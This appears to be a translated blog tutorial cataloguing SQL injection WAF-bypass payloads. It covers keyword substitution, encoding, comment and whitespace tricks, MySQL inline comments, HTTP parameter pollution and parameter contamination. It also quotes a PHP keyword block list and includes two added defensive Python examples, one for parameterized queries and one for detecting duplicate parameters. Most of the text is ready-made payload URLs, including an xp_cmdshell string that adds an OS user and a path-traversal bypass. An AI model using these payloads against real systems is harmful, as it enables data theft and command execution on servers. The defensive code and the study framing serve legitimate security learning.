Some notes on SQL injection bypasses
一、 Approaches to bypassing a WAF
Start from the first step, analyze the filter a little at a time, and then get around it.
1、Filtering and, or
preg_match('/(and|or)/i', $id)
Filtered injection: `1 or 1=1`, `1 and 1=1`
Bypassed injection: `1 || 1=1`, `1 && 1=1`
2、Filtering and, or, union
preg_match('/(and|or|union)/i', $id)
Filtered injection: `union select user,password from users`
Bypassed injection: `1 || (select user from users where user_id=1)='admin'`
3、Filtering and, or, union, where
preg_match('/(and|or|union|where)/i', $id)
Filtered injection: `1 || (select user from users where user_id=1)='admin'`
Bypassed injection: `1 || (select user from users limit 1)='admin'`
4、Filtering and, or, union, where, limit
preg_match('/(and|or|union|where|limit)/i', $id)
Filtered injection: `1 || (select user from users limit 1)='admin'`
Bypassed injection: `1 || (select user from users group by user_id having user_id=1)='admin'`
5、Filtering and, or, union, where, limit, groupby
preg_match('/(and|or|union|where|limit|groupby)/i', $id)
Filtered injection: `1 || (select user from users group by user_id having user_id=1)='admin'`
Bypassed injection: `1 || (select substr(group_concat(user_id),1,1) user from users)=1`
6、Filtering and, or, union, where, limit, groupby, select
preg_match('/(and|or|union|where|limit|groupby|select)/i', $id)
Filtered injection: `1 || (select substr(group_concat(user_id),1,1) user from users)=1`
Bypassed injection: `1 || 1=1 into outfile 'result.txt'`
Bypassed injection: `1 || substr(user,1,1)='a'`
7、Filtering and, or, union, where, limit, groupby, select, '
preg_match('/(and|or|union|where|limit|groupby|select|\')/i', $id)
Filtered injection: `1 || (select substr(group_concat(user_id),1,1) user from users)=1`
Bypassed injection: `1 || user_id is not null`
Bypassed injection: `1 || substr(user,1,1)=0x61`
Bypassed injection: `1 || substr(user,1,1)=unhex(61)`
8、Filtering and, or, union, where, limit, groupby, select, ', hex
preg_match('/(and|or|union|where|limit|groupby|select|\'|hex)/i', $id)
Filtered injection: `1 || substr(user,1,1)=unhex(61)`
Bypassed injection: `1 || substr(user,1,1)=lower(conv(11,10,36))`
9、Filtering and, or, union, where, limit, groupby, select, ', hex, substr
preg_match('/(and|or|union|where|limit|groupby|select|\'|hex|substr)/i', $id)
Filtered injection: `1 || substr(user,1,1)=lower(conv(11,10,36))`
Bypassed injection: `1 || lpad(user,7,1)`
10、Filtering and, or, union, where, limit, groupby, select, ', hex, substr, whitespace
preg_match('/(and|or|union|where|limit|groupby|select|\'|hex|substr|\s)/i', $id)
Filtered injection: `1 || lpad(user,7,1)`
Bypassed injection: `1%0b||%0blpad(user,7,1)`
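The ten steps above show why a keyword blacklist never converges: each new filter is answered by an equivalent expression the regex does not name. The fix a defender actually wants is to stop splicing request text into SQL at all. The following Python is an added example, not code from the original article; it uses the standard-library sqlite3 module in memory as a stand-in for the MySQL/PHP setup (an assumption), with a constructed three-row `users` table mirroring the columns the page queries. It places the vulnerable concatenation beside the parameterized query and an integer allow-list check, and shows that the page's `1 or 1=1` input, which returns every row through concatenation, matches nothing once it is bound as data. (SQLite reads `||` as string concatenation rather than OR, so the `||` variants from the steps above are not used as the demonstration payload.)

```python
import re
import sqlite3


def demo_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the page's `users` table.
    Assumption: SQLite in memory instead of MySQL; the injection mechanics are the same."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER PRIMARY KEY, user TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "s3cret"), (2, "alice", "hunter2"), (3, "bob", "pw")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """The pattern every step of section 一 is attacking: request text spliced into SQL.
    Whatever the blacklist lets through is parsed as SQL by the database."""
    return conn.execute(f"SELECT user FROM users WHERE user_id = {user_id}").fetchall()


def lookup_parameterized(conn: sqlite3.Connection, user_id: str) -> list:
    """Same query with the value bound as a parameter. The driver ships it as data,
    so operators, comments, hex literals and whitespace tricks are never tokenized as SQL.
    A non-numeric string simply fails to compare equal to any integer user_id."""
    return conn.execute("SELECT user FROM users WHERE user_id = ?", (user_id,)).fetchall()


def lookup_strict(conn: sqlite3.Connection, user_id: str) -> list:
    """Defence in depth: an id must be a plain ASCII integer. Anything else is rejected
    before any SQL is built, which also gives a clean event to log and alert on."""
    if not re.fullmatch(r"[0-9]{1,18}", user_id):
        raise ValueError(f"rejected user_id: {user_id!r}")
    return conn.execute(
        "SELECT user FROM users WHERE user_id = ?", (int(user_id),)
    ).fetchall()


if __name__ == "__main__":
    conn = demo_db()
    for payload in ("1", "1 or 1=1"):
        print(f"{payload!r:12} concatenated -> {lookup_vulnerable(conn, payload)}")
        print(f"{payload!r:12} bound        -> {lookup_parameterized(conn, payload)}")
```

Run stand-alone, the script prints one row for the id `1` under both functions and all three rows for `1 or 1=1` only under the concatenated query. The strict variant is the one to wire into an application: the parameter binding removes the injection, and the allow-list turns every payload in the steps above into a rejected request rather than a query the database has to interpret.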
二、Regex bypass
Bypass by exploiting the loose matching of the regex: it only rejects the exact characters it names. For example, when `=` is filtered:
Filtered injection: `1 or 1=1`
Bypassed injection: `1 or 1`, `1 or '1'`, `1 or char(97)`
e.g.
Filtered injection: `1 union select 1,table_name from information_schema.tables where table_name='users'`
Bypassed injection: `1 union select 1,table_name from information_schema.tables where table_name between 'a' and 'z'`
Bypassed injection: `1 union select 1,table_name from information_schema.tables where table_name between char(97) and char(122)`
Bypassed injection: `1 union select 1,table_name from information_schema.tables where table_name between 0x61 and 0x7a`
Bypassed injection: `1 union select 1,table_name from information_schema.tables where table_name like 0x7573657273`
三、General bypasses
1. Comment symbols
`?id=1+un/**/ion+se/**/lect+1,2,3--`
2. Case
`?id=1+UnIoN/**/SeLecT/**/1,2,3--`
3. Keyword replacement
Some WAFs use preg_replace to replace SQL keywords:
`?id=1+UNunionION+SEselectLECT+1,2,3--`
`?id=1+uni%0bon+se%0blect+1,2,3--`
Sometimes the comment `/**/` is filtered as well; `%0b` can be used instead:
Forbidden: `http://localhost/id/1/**/||/**/lpad(first_name,7,1).html`
Bypassed: `http://localhost/id/1%0b||%0blpad(first_name,7,1).html`
4. Encoding
A classic script: Nukesentinel.php

```php
// Check for UNION attack
// Copyright 2004 (c) Raven PHP Scripts
$blocker_row = $blocker_array[1];
if ($blocker_row['activate'] > 0) {
    if (stristr($nsnst_const['query_string'], '+union+') OR
        stristr($nsnst_const['query_string'], '%20union%20') OR
        stristr($nsnst_const['query_string'], '*/union/*') OR
        stristr($nsnst_const['query_string'], 'union') OR
        stristr($nsnst_const['query_string_base64'], '+union+') OR
        stristr($nsnst_const['query_string_base64'], '%20union%20') OR
        stristr($nsnst_const['query_string_base64'], '*/union/*') OR
        stristr($nsnst_const['query_string_base64'], 'union')) {
        // block_ip($blocker_row);
        die("BLOCKIP1");
    }
}
```

Forbidden: `http://localhost/php/?/**/union/**/select`
Bypassed: `http://localhost/php/?/%2A%2A/union/%2A%2A/select`
Bypassed: `http://localhost/php/?%2f**%2funion%2f**%2fselect`
5. Buffer overflow
`http://localhost/news.php?id=1+and+(select 1)=(select 0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10--`
6. Inline comments (MySQL)
`http://localhost/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--`
`http://localhost/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--`
四、Advanced bypasses
1. HPP (HTTP parameter pollution)
For example, with `index.php?par1=val1&par1=val2`:

| web server | par1 |
|:---|:---|
| ASP.NET/IIS | val1,val2 |
| ASP/IIS | val1,val2 |
| PHP/Apache | val2 |
| JSP/Tomcat | val1 |

e.g.
In an ASP/ASP.NET environment:
Forbidden: `http://localhost/search.aspx?q=select name,password from users`
Bypassed: `http://localhost/search.aspx?q=select name&q=password from users`
Bypassed: `http://localhost/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users`
Bypassed: `http://localhost/news.aspx?id=1';/*&id=1*/EXEC/*&id=1*/master..xp_cmdshell/*&id=1*/net user test test/*&id=1*/--`
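The table above says the same `par1=val1&par1=val2` reaches the application as a different string depending on the server, which is exactly what the ASP examples rely on: the comma that ASP inserts when joining duplicates completes the query. The following Python is an added example, not from the article. It parses a query string keeping every value per name, reports names that occur more than once (the check a WAF or application front-end should make, since a legitimate request normally has no reason to repeat `q` or `id`), and renders the first/last/joined views from the table so a test suite can see what each platform family would hand the application. The view labels are constructed from the table; the real behaviour of any given server version should be confirmed against that server.

```python
from urllib.parse import parse_qsl


def parse_query(qs: str) -> dict:
    """Parse a query string keeping every value for every name, in order.

    A plain dict that keeps only the first or last value silently hides the
    duplicates, which is how pollution goes unnoticed at the inspection layer.
    """
    out: dict = {}
    for name, value in parse_qsl(qs, keep_blank_values=True):
        out.setdefault(name, []).append(value)
    return out


def duplicated_params(qs: str) -> dict:
    """Names that appear more than once, with all their values. Non-empty means the
    request should be rejected (or at least logged) before it reaches the application."""
    return {name: values for name, values in parse_query(qs).items() if len(values) > 1}


def joined_views(qs: str) -> dict:
    """What each server family in the page's table would pass on for every name."""
    parsed = parse_query(qs)
    return {
        "first (JSP/Tomcat)": {k: v[0] for k, v in parsed.items()},
        "last (PHP/Apache)": {k: v[-1] for k, v in parsed.items()},
        "joined (ASP/ASP.NET)": {k: ",".join(v) for k, v in parsed.items()},
    }


if __name__ == "__main__":
    # Constructed inputs taken from the page's search.aspx examples.
    for qs in ("q=select name&q=password from users",
               "q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users",
               "id=1"):
        print(qs)
        print("  duplicates:", duplicated_params(qs))
        for label, view in joined_views(qs).items():
            print(f"  {label:22} {view}")
```

Run stand-alone, the first two query strings are reported as polluted and the joined view reproduces the single query that the forbidden request would have carried, while `id=1` passes clean. The practical rule that falls out of it: normalize duplicates the same way the backend does before inspecting, or refuse them outright, and keep the inspection layer and the application on the same parsing rules.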
2. HPC (HTTP parameter contamination)
RFC 2396 defines the following character classes:
Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ( )
Reserved: ; / ? : @ & = + $ ,
Unwise: { } | \ ^ [ ] `
Different web servers apply different logic when handling specially crafted requests:

| Query string | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP |
|:---|:---|:---|
| ?test[1=2 | test_1=2 | test[1=2 |
| ?test=% | test=% | test= |
| ?test%00=1 | test= | test=1 |
| ?test=1%001 | NULL | test=1 |
| ?test+d=1+2 | test_d=1 2 | test d=1 2 |

e.g.
Forbidden: `http://localhost/?xp_cmdshell`
Bypassed: `http://localhost/?xp[cmdshell`
Forbidden: `http://localhost/test.asp?file=../flag.txt`
Bypassed: `http://localhost/test.asp?file=.%./flag.txt`
Forbidden: `http://localhost/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)`
Bypassed: `http://localhost/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)`
Summary
The above is a summary of SQL injection bypass techniques. I hope it is of some help to your study or work; if you have questions, leave a comment and we can discuss them. Thank you for supporting 毛票票.